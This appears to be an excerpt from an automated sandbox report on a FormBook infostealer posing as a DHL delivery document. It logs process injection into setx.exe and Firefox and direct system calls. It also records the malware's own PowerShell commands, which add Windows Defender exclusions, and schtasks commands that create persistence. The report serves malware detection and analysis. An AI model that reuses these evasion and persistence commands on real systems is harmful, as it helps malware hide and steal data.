Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtReadFile: Direct from: 0x76EF2ADC Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtResumeThread: Direct from: 0x76EF2FBC Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtCreateUserProcess: Direct from: 0x76EF371C Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtWriteVirtualMemory: Direct from: 0x76EF490C Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe NtCreateKey: Direct from: 0x76EF2C6C
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: NULL target: C:\Windows\SysWOW64\setx.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\setx.exe Thread register set: target process: 8188 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\setx.exe Thread APC queued: target process: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Process created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe" Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Queries volume information: C:\Users\user\Desktop\DHL_Delivery Documents.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Queries volume information: C:\Users\user\AppData\Roaming\YybGLWQSx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
